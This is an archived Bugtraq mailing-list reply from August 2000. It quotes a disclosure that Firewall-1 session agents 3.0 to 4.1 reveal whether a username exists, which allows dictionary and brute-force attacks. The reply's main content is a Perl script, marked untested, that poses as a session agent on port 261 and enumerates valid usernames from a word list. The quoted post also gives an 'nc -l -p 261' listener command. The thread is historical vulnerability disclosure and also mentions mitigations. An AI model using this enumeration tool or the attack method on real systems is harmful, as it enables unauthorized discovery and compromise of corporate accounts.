Bugtraq mailing list archives
Re: Firewall-1 session agent 3.0 -> 4.1,dictionnary and brute force attack
From: Nelson Brito <nelson () SEKURE ORG>
Date: Fri, 18 Aug 2000 07:39:15 -0300
Try this code and let me know if it works... PS: Just a question, if the user is right and password wrong, Will it return error code?!?! =) ---brute-fw1-agent.pl #!/usr/bin/perl -w # # File : brute-fw1-agent.pl # Author: Nelson Brito<nelson () secunet com br || nelson () sekure org> # # Untested code, use on your own risc. # use Socket; $c = 0; $port = 261; #$proto = getprotobyname('tcp'); socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket:$!"; setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(FAGENT, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(FAGENT, SOMAXCONN) or die "listen: $!"; open(SDI, "users") or die "open: $!\n"; until(eof(SDI)){ $user = <SDI>; chomp($user); next if ($user=~/^\s*#/); next if ($user=~/^\s*$/); push @users, $user; } close(SDI); while(accept(MODULE, FAGENT)){ LINE: $c++; print STDOUT "[+] Hii... I'm on TV $c times!\n"; recv(MODULE, $target, 1024, 0); if($target=~/^331/i){ chomp($users[0]); send(MODULE, "$users[0]\n", 0); recv(MODULE, $target, 1024, 0); if($target=~/^220/){ recv(MODULE, $target, 1024, 0); if($target=~/^530/){ shift @users; goto LINE; }else{ die "[-] Unknow code. What happened?\n"; } }elsif($target=~/^331/){ print STDOUT "[+] The $users[0] username is right!\n"; }else{ die "[-] Uknow return code. What happened?\n"; } }else{ die "[-] Unknow return code. What happened?\n"; } } ---brute-fw1-agent.pl gregory duchemin wrote:
hi, every session agents from 3.0 to 4.1 (4.1 included, all plateforms ) are vulnerables to a brute force and dictionnary style password attack. while authenticating a user through his port 261, firewall modules send a "331 User:" string to the agent, wait for an answer, and then reply with a "220 User .... not found" directly followed by "530 NOTOK" if username doesn't match the user database If username exists, firewall will simply reply "331 *FireWall-1 password:" before waiting for a pass value. So the same weakness that on the old version of unix's login, we can know if a username is or isn't try #nc -l -p 261 on your workstation then connect to an outside service that need session authentication Because firewall-1 doesn't close the connection just after a mistaked username or password submission and seems to wait indefinitly for a correct entry, it should be really efficient to mount such an attack. usernames and passwords are up to 8 chars length and are usually built on some logical rules (typicaly based on first and last names for usernames and more generaly on dictionnaries words) A C or perl program with dictionnary trying permutations onto each word should be able to quickly recover many corporate accounts. This program would be a little daemon, and would have to send a spoofed request to outside before each connection, finally it should be able to accept a significant number of simultaneous connection to increase its chances of success. I don't have right now the time to make the code. Just verify your passwords are enough hard in the same way u already did it with your unix passwords. And for those who have a 4.1 firewall module, just use encryption. Have a nice day Gregory Duchemin ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
Sorry my poor English! Sem mais, -- Nelson Brito - http://stderr.sekure.org/ During a meditation session, Santana said, an entity called Metatron had announced: "We want to hook you back to the radio-airwave frequency."
Current thread:
- Firewall-1 session agent 3.0 -> 4.1, dictionnary and brute force attack gregory duchemin (Aug 16)
- Re: Firewall-1 session agent 3.0 -> 4.1,dictionnary and brute force attack Nelson Brito (Aug 18)